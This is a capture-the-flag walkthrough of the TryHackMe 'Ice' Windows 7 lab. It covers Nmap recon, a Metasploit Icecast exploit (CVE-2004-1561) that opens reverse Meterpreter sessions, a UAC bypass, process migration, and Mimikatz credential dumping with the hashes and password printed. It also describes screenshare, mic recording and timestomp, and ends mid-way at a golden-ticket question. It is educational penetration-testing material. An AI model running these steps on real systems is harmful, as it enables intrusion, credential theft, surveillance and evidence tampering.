Hello everyone, and welcome to a new video in the TryHackMe
playlist! This is my first walkthrough video on TryHackMe, and in this video,
we'll be exploiting and gaining privilege escalation on a vulnerable VM called
"Ice."
You might wonder why I chose this VM. During my time with
VulnHub, I never encountered any vulnerable Windows VMs, so I decided to
explore TryHackMe. Although several Windows VMs are available, I decided
to start with a free one, and "Ice" was my choice.
As I mentioned in my introductory video, TryHackMe is known
for its structured learning paths. In this video, our goal is to follow the
given tasks, deploy, and hack into a Windows machine by exploiting a poorly
secured media server.
Task 1: Connect
Connecting to the TryHackMe network is the primary step, and
it's crucial to remember that you must connect every time you start your
attacking machine.
To reach the TryHackMe network we use a VPN bridge, and the client used
for it is OpenVPN. If you've watched the HackTheBox series, you'll be
familiar with how OpenVPN is used for this purpose.
Here's how to do it:
First, download the configuration file: visit the TryHackMe access page
and download your OpenVPN configuration (.ovpn) file.
Then open a terminal and connect with the OpenVPN client. The command
needs sudo because it creates the tun0 network interface.
┌──(kali㉿kali)-[~]
└─$ sudo openvpn <OpenVPN Configuration file>
When you run this command, you'll
see a lot of text. At the end, it should say "Initialization Sequence
Completed."
You can verify your connection by looking at your access
page on TryHackMe. Refresh the page, and you should see a green tick next to
"Connected." It will also show your internal IP address.
Now that you're connected, you are ready to use the machines
on the TryHackMe network! When we deploy the VM in our task, you'll see its
internal IP address.
Note that the virtual machine used in this room (Ice) can also be
downloaded for offline use; click the link provided in the room to reach the
download page. The sequel to this room, Blaster, can be found there as well.
Task 2: Recon
In the past, I used the term "Enumeration," which
is synonymous with "Recon." So don't get confused by the terminology.
Our first priority is to scan and enumerate our target. But before we do that,
we need to identify our target.
First, we have to deploy the machine! This may take up to
three minutes to start. Once the machine is deployed, the target IP address
will be provided.
For this task, the target IP is 10.10.162.253.
Before proceeding, ensure that the target is reachable by
performing a ping test. This helps confirm that the target is connected to our
network and is receiving data.
┌──(kali㉿kali)-[~]
└─$ ping 10.10.162.253
PING 10.10.162.253 (10.10.162.253) 56(84) bytes of data.
64 bytes from 10.10.162.253: icmp_seq=1 ttl=124 time=479 ms
64 bytes from 10.10.162.253: icmp_seq=2 ttl=124 time=228 ms
64 bytes from 10.10.162.253: icmp_seq=3 ttl=124 time=242 ms
^C
--- 10.10.162.253 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 227.922/316.024/478.592/115.087 ms
┌──(kali㉿kali)-[~]
└─$
The replies also carry ttl=124. Windows hosts send with a default TTL of
128, so 124 means the target is four hops away and is an early hint at the
operating system before Nmap confirms it.
Now let's perform a port scan to find out which ports are open. This is a
crucial part of recon, as it maps the attack surface and lets us plan
targeted attacks.
Perform Network Scan using Nmap
We will use the famous Nmap tool for this purpose.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.162.253
Where,
The -sC option is used to perform a script scan
using the default set of scripts. It's useful for gathering additional
information about the target.
The -sV option enables version detection, which
identifies the versions of services running on open ports.
The -Pn option skips Nmap's own host discovery and treats the host as
online. It is useful when ICMP is filtered; here the ping already succeeded,
so it only saves the discovery probes. Note that without -p- Nmap scans only
its 1,000 most common TCP ports, which is why the output below accounts for
exactly 1,000 ports (988 closed plus 12 open).
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 22:56 IST
Nmap scan report for 10.10.162.253
Host is up (0.41s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2024-07-22T17:04:45
|_Not valid after: 2025-01-21T17:04:45
| rdp-ntlm-info:
| Target_Name: DARK-PC
| NetBIOS_Domain_Name: DARK-PC
| NetBIOS_Computer_Name: DARK-PC
| DNS_Domain_Name: Dark-PC
| DNS_Computer_Name: Dark-PC
| Product_Version: 6.1.7601
|_ System_Time: 2024-07-23T17:29:31+00:00
|_ssl-date: 2024-07-23T17:30:01+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.98 seconds
┌──(kali㉿kali)-[~]
└─$
The scan reveals a good deal about 10.10.162.253: it is a Windows 7
Professional SP1 machine (build 7601) named Dark-PC in the workgroup
WORKGROUP, and 12 of the 1,000 ports Nmap probes by default are open:
135/TCP (msrpc): the Microsoft RPC endpoint mapper. Clients ask it which
of the dynamic high ports (listed at the bottom) a given RPC interface lives
on.
139/TCP (netbios-ssn): the NetBIOS session service, i.e. SMB carried over
NetBIOS. (The NetBIOS name service is a different thing and runs on 137/UDP.)
445/TCP (microsoft-ds): SMB directly over TCP, which is where file and
printer shares are served. Nmap's SMB probes are what gave us the exact OS
version and the workgroup, and the host-script line at the end says SMB
message signing is disabled, which is the Windows 7 workstation default and
leaves the host open to NTLM relay.
3389/TCP (ms-wbt-server): Remote Desktop, wrapped in TLS. The self-signed
certificate is issued to Dark-PC and valid from July 22nd, 2024 to January
21st, 2025, and the rdp-ntlm-info script recovered the hostname and product
version 6.1.7601 without authenticating.
5357/TCP (http): Microsoft-HTTPAPI/2.0, the http.sys listener behind Web
Services on Devices (WSDAPI) on Windows 7. It answers "Service Unavailable"
and is not a way in.
8000/TCP (http): Nmap positively identified an Icecast streaming media
server here; the page simply has no HTML title. This is the interesting
service.
49152/TCP, 49153/TCP, 49154/TCP, 49158/TCP, 49159/TCP, 49160/TCP: dynamic
RPC endpoints from the ephemeral range (49152 and up on Vista and later).
Two are labelled unknown only because no version probe matched; asking the
endpoint mapper on 135 (for example with Impacket's rpcdump.py) tells you
which interface each one serves.
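A small triage script, as an added example for this walkthrough (not part of the room or of Nmap): it parses the port table from the scan above, checks that the open and "not shown" counts add up to Nmap's default 1,000 ports, recovers the hostname from the rdp-ntlm-info output and flags the findings a pentester would note. The scan text is embedded, abridged, from this page; the triage rules are my own simplification.

```python
"""Triage an Nmap -sC -sV report: pull the open-port table out of the text,
check the port accounting and flag the services worth chasing.
Added example for this walkthrough, not part of the room or of Nmap;
SCAN_REPORT is the page's own scan output, abridged and embedded so the
script runs offline."""
import re
from typing import Dict, List, Optional

SCAN_REPORT = """\
Nmap scan report for 10.10.162.253
Host is up (0.41s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Dark-PC
| rdp-ntlm-info:
|   NetBIOS_Computer_Name: DARK-PC
|_  Product_Version: 6.1.7601
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http               Icecast streaming media server
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_  message_signing: disabled (dangerous, but default)
"""

# One port line of Nmap's normal output: "<port>/<proto> <state> <service> [<version>]".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)(?:\s+(.+))?$")


def parse_ports(report: str) -> List[Dict[str, object]]:
    """Return one dict per port line; NSE script lines (starting with '|') are ignored."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5)})
    return ports


def port_accounting(report: str, ports: List[Dict[str, object]]):
    """(not shown, open, total): total should be 1000 for a default top-ports scan."""
    m = re.search(r"Not shown: (\d+) (?:closed|filtered)", report)
    not_shown = int(m.group(1)) if m else 0
    open_count = sum(1 for p in ports if p["state"] == "open")
    return not_shown, open_count, not_shown + open_count


def hostname(report: str) -> Optional[str]:
    """Hostname leaked before authentication by the rdp-ntlm-info script."""
    m = re.search(r"NetBIOS_Computer_Name:\s*(\S+)", report)
    return m.group(1) if m else None


def triage(report: str, ports: List[Dict[str, object]]) -> List[str]:
    """Follow-ups a pentester notes on a Windows host; the rules are deliberately simple."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        port, svc, ver = p["port"], p["service"], p["version"] or ""
        if svc == "microsoft-ds":
            findings.append(f"{port}: SMB exposed ({ver}); check signing, null sessions, patch level")
        elif "ms-wbt-server" in svc:
            findings.append(f"{port}: RDP exposed; usable once credentials are recovered")
        elif "Icecast" in ver:
            findings.append(f"{port}: Icecast streaming server; compare version with CVE-2004-1561")
        elif port >= 49152 and svc in ("msrpc", "unknown"):
            findings.append(f"{port}: dynamic RPC endpoint allocated via the endpoint mapper on 135")
    if "message_signing: disabled" in report:
        findings.append("SMB signing disabled: NTLM relay to this host is possible")
    return findings


if __name__ == "__main__":
    found = parse_ports(SCAN_REPORT)
    print("host:", hostname(SCAN_REPORT), "accounting:", port_accounting(SCAN_REPORT, found))
    for line in triage(SCAN_REPORT, found):
        print(" -", line)
```

parse_ports ignores the NSE script lines, and port_accounting is the quick sanity check that a scan covered what you think it did: the "not shown" count plus the open ports must equal the number of ports Nmap was asked to probe.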
Answer the questions below
What is the port number of one of the more interesting ports that is open,
Microsoft Remote Desktop (MSRDP)?
As noted above, this is 3389.
What service did nmap identify as
running on port 8000? (First word of this service)
This port 8000 runs the Icecast streaming media server. So,
the first word of this service is Icecast.
What does Nmap identify as the
hostname of the machine?
The hostname identified by Nmap is DARK-PC.
Now, let's move on to Task 3.
Task 3: Gain Access
Gaining access means exploiting a vulnerability to establish a foothold on
the target. In the previous task we identified several interesting services,
Icecast among them.
Icecast is open-source software for streaming audio over the internet, much
like a digital radio station; it can be used to run online radio stations or
host personal audio libraries. The version on our target, however, has a
well-known high-severity vulnerability (CVSS v2 base score 7.5, listed as 7.4
by some sources): Icecast 2.0.1 and earlier on Win32 mishandles HTTP requests
with 32 or more header lines, and the excess overwrites a saved return
address on the stack, so an unauthenticated client can execute code inside
the Icecast process. That is the bug the Metasploit module icecast_header
exploits below.
Answer the questions below
What is the Impact Score for this vulnerability? The room hints at using
CVEdetails.com to find the impact score.
However, I couldn't find the information directly on the site. Instead, I
used a useful trick: a Google search led me to an Exploit DB link where the
CVE details are available.
The vulnerability in question is associated with Icecast 2.0.1 (Win32) and
is identified as CVE-2004-1561.
Based on the details found, the Impact Score for this vulnerability is 6.4.
That is the CVSS v2 impact subscore for partial confidentiality, integrity
and availability impact (C:P/I:P/A:P); with a network vector, low complexity
and no authentication required it produces the 7.5 base score.
What is the CVE number for this
vulnerability?
As found above, the CVE number is CVE-2004-1561.
Now that we’ve identified the vulnerability, let’s find and
use the corresponding exploit with Metasploit.
Exploit using MSF Console
Let's go ahead and launch the Metasploit framework.
┌──(kali㉿kali)-[~]
└─$ sudo msfdb start && msfconsole
[sudo] password for kali:
[i] Database already started
Metasploit tip: Writing a custom module? After editing your module, why not try
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/icecast_header) >
The module is selected with use exploit/windows/http/icecast_header and its
settings are listed with show options (the listing above is abbreviated). We
need to set RHOSTS (the target IP) and LHOST (our IP). LHOST must be the
address of the tun0 adapter, the VPN interface; the default shown, 10.0.2.15,
is a local interface address the target cannot route back to.
With all options set, we are now ready to execute the
exploit.
msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.162.253
RHOSTS => 10.10.162.253
msf6 exploit(windows/http/icecast_header) > set LHOST 10.17.23.11
LHOST => 10.17.23.11
msf6 exploit(windows/http/icecast_header) >
On a successful run we get a Meterpreter session:
msf6 exploit(windows/http/icecast_header) > run
[*] Started reverse TCP handler on 10.17.23.11:4444
[*] Sending stage (176198 bytes) to 10.10.162.253
[*] Meterpreter session 1 opened (10.17.23.11:4444 -> 10.10.162.253:49260) at 2024-07-23 23:26:12 +0530
meterpreter >
Answer the given questions
The only required option that is still blank is RHOSTS.
LHOST is also required. If you use the AttackBox or a paid membership it
may already be populated correctly; on your own VPN-connected machine it
defaults to a local interface address (10.0.2.15 above), which the target
cannot reach, so set it to your tun0 address.
Task 4: Escalate
We've gained access to the victim machine; now it's time to enumerate the
system and find a path to administrative privileges. To keep on track we
will follow the room's questions.
What's the name of
the shell we have now?
We are currently using the Meterpreter shell.
What user was running
that Icecast process?
To determine which user runs the Icecast process, list the running
processes with the ps command in Meterpreter (output abbreviated to the
relevant lines):
2256 1444 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2412 692 sppsvc.exe
2580 692 SearchIndexer.exe
meterpreter >
From the output, you’ll
see that the Icecast process (Icecast2.exe)
is running under the user Dark.
Answer the questions below
What build of Windows
is the system?
To get the Windows build information, use the sysinfo command in
Meterpreter.
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
The build number of the Windows system is 7601.
Now that we know some of the finer details of the system, let's start
escalating our privileges. First, what is the architecture of the process
we're running?
Careful here: sysinfo reports the operating system as x64, but the
Meterpreter line reads x86/windows, and the ps output showed Icecast2.exe as
an x86 process. We are a 32-bit process on 64-bit Windows, so the answer is
x86.
Now that we know the architecture, let's perform additional reconnaissance
with the local exploit suggester. Because we are running from a 32-bit
process on an x64 system, several checks cannot validate the target and the
results are less reliable than on a matching architecture, but it is still
the quickest way to shortlist local exploits.
This command may appear to hang for a few minutes as it tests various
exploits. Once it completes, it lists the potential local privilege
escalation exploits.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.162.253 - Collecting local exploits for x86/windows...
[*] 10.10.162.253 - 193 exploit checks are being tried...
[+] 10.10.162.253 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.162.253 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.162.253 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.162.253 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
8 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
9 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
11 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
12 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
13 exploit/windows/local/always_install_elevated No The target is not exploitable.
14 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
15 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
16 exploit/windows/local/bthpan No The target is not exploitable.
17 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
18 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
19 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
23 exploit/windows/local/ikeext_service No The check raised an exception.
24 exploit/windows/local/ipass_launch_app No The check raised an exception.
25 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
27 exploit/windows/local/mqac_write No The target is not exploitable.
28 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
meterpreter >
From the results we pick an exploit that gives us full access. For this
walkthrough we take the first one, bypassuac_eventvwr. Note what it is: not
a kernel exploit but a UAC bypass. It only works because Dark is a member of
the local Administrators group running with a filtered (medium-integrity)
token; the module plants a command under
HKCU\Software\Classes\mscfile\shell\open\command, which the auto-elevating
eventvwr.exe reads and executes, so the payload starts with the full
administrator token. Anything running as a standard user would need one of
the kernel exploits further down the list instead.
Answer the questions below
What is the full path for the first
returned exploit?
The path for the first exploit is exploit/windows/local/bypassuac_eventvwr.
Once you’ve identified the exploit to use, background the
current session to proceed with the next steps. You can do this by typing, background or by pressing Ctrl + Z.
Before proceeding with the exploit, take note of the session
number you have. You can list all active sessions by using the command sessions when outside the
Meterpreter shell. In my case, the session number is 1.
Now, go ahead and select the previously identified local
exploit for use with the command, use, and then specify the full path for the exploit.
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) >
It’s time to check the available options to configure.
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) >
Local exploits need a session to work from, so set it with set SESSION
<session number>. After that, check the options again: one more needs
changing, because the listener address (LHOST) is still the wrong interface.
Set LHOST now:
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.17.23.11
LHOST => 10.17.23.11
msf6 exploit(windows/local/bypassuac_eventvwr) >
Answer the questions below
What is the name of this option?
The answer is LHOST.
Once the options are configured, run the privilege escalation exploit by
typing run.
This might take a few attempts; if it fails, restart the machine and
re-exploit the Icecast service to get a fresh session. After a successful
escalation a new Meterpreter session opens:
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.17.23.11:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176198 bytes) to 10.10.162.253
[*] Cleaning up registry keys ...
[*] Meterpreter session 2 opened (10.17.23.11:4444 -> 10.10.162.253:49275) at 2024-07-23 23:38:55 +0530
meterpreter >
We can now verify the expanded permissions with getprivs. SeDebugPrivilege in
the list is what lets us open other users' processes, lsass.exe included,
which we rely on in the next task.
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter >
Answer the questions below
What permission listed allows us to take
ownership of files?
The “SeTakeOwnershipPrivilege” permission listed allows us
to take ownership of files.
Let’s move on to the next task.
Task 5: Looting
In this task we will gather additional credentials and the saved password
hashes on the machine. Before we can do that we need to move into a process
that actually has what we need to interact with the lsass service, the Local
Security Authority process that handles authentication in Windows.
To identify a suitable process, we first list all running
processes by using the command ps. This will display a list of processes along
with their process IDs (PIDs), names, and the users running them.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
508 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
688 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
2256 1444 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2272 692 taskhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\taskhost.exe
2412 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2580 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
meterpreter >
Now we have to identify a suitable process.
Look for processes running as NT AUTHORITY\SYSTEM. Our elevated session
still runs as Dark, and it is a 32-bit process; lsass.exe is a 64-bit process
running as SYSTEM. Migrating into a SYSTEM-level x64 process gives us both
the token and the matching architecture needed to read lsass memory, and
from there we can proceed to gather credentials.
The print spooler service, spoolsv.exe, is the usual choice: it runs as
SYSTEM, it is x64, and the Spooler service is configured to restart
automatically if it crashes, so a failed injection does not leave a visible
hole.
Answer the questions below
What's the name of the printer
service?
The answer is spoolsv.exe.
'Living in' a process refers to injecting code into a running program, in
Meterpreter's case by reflectively loading a DLL into it and spawning a
thread that hosts our shell. spoolsv.exe does not appear in the abbreviated
ps listing above, but migrate can target it by name:
migrate -N <PROCESS_NAME>.
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1216 to 1304...
[*] Migration completed successfully.
meterpreter >
Let’s Check the Current User. After migrating, verify the
user context by running the command getuid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Answer the questions below
What user is listed?
The answer should be NT AUTHORITY\SYSTEM.
Now that we run as SYSTEM, we can focus on extracting credentials from the
system.
Using Mimikatz
Mimikatz is the well-known credential dumping tool. Inside Meterpreter we
use Kiwi, the extension that embeds Mimikatz 2.x and runs it in the session's
memory, loaded with load kiwi. This adds a set of commands to the help menu;
type help to see them:
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitrary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
For more info on a specific command, use <command> -h or help <command>.
Answer the questions below
Which command allows us to retrieve all credentials?
The answer is creds_all, which runs every credential provider parser at
once.
Run the creds_all command, to dump all available credentials.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
meterpreter >
Mimikatz can read these secrets because Windows 7 keeps reversible copies of
logon credentials in LSASS for the WDigest, TsPkg and Kerberos providers;
that is why the cleartext appears three times. On Windows 8.1 and later, and
on Windows 7 with KB2871997 plus the registry value UseLogonCredential set to
0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest,
WDigest stops caching the password. The credentials are in memory at all,
with nobody typing at the console, because the scheduled task that starts
Icecast logs Dark on and so creates a logon session. The msv entry also
shows a populated LM hash, which tells us the password is 14 characters or
fewer; the NTLM hash is unsalted MD4 of the UTF-16LE password and is usable
as-is for pass-the-hash. Finally, there is no Windows Defender or other
endpoint protection on the box to notice a SYSTEM process opening lsass.exe.
Answer the questions below
What is Dark's password?
The
password is Password01!
Now that we've retrieved the necessary credentials, let's
move on to the next task.
Task 6: Post-Exploitation
Let's explore the post-exploitation actions we can take on a
Windows system. These actions can provide valuable information and access, but
they should be carried out with caution and only when authorized.
Before diving into specific actions, let's revisit the help
menu in the meterpreter shell. We'll use it to answer the following questions.
Answer the questions below
What command allows
us to dump all of the password hashes stored on the system?
The answer is hashdump.
The hashdump command allows us to
dump all the password hashes stored on the system.
Note that hashdump reads the SAM, so it returns the NT hashes of the local
accounts, Administrator included. We won't try to crack that one: the room
sets it intentionally strong, and cracking it is not part of the exercise.
The hashes are still usable without cracking, for example via pass-the-hash
over SMB.
Answer the questions below
While more useful
when interacting with a machine being used, what command allows us to watch the
remote user's desktop in real-time?
The screenshare command streams the remote user's desktop to a local viewer in real time.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/XprjEfJc.html
[*] Streaming...
This is
particularly useful when the machine is actively being used.
Answer the questions below
How about if we
wanted to record from a microphone attached to the system?
The record_mic
command can be used to record audio from the system's microphone.
To complicate forensics efforts we can modify the timestamps of files on the
system. What command allows us to do this?
The timestomp command modifies file timestamps.
Important note: this should only be done if explicitly allowed, as it
complicates the forensic analysis of a pentest. It is also only partly
effective: timestomp rewrites the $STANDARD_INFORMATION timestamps, while the
$FILE_NAME attribute timestamps and the NTFS journals ($LogFile, $UsnJrnl)
keep the original values, which is exactly what an analyst compares them
against.
Mimikatz allows us to create what's called a golden ticket, allowing us to
authenticate anywhere with ease. What command allows us to do this?
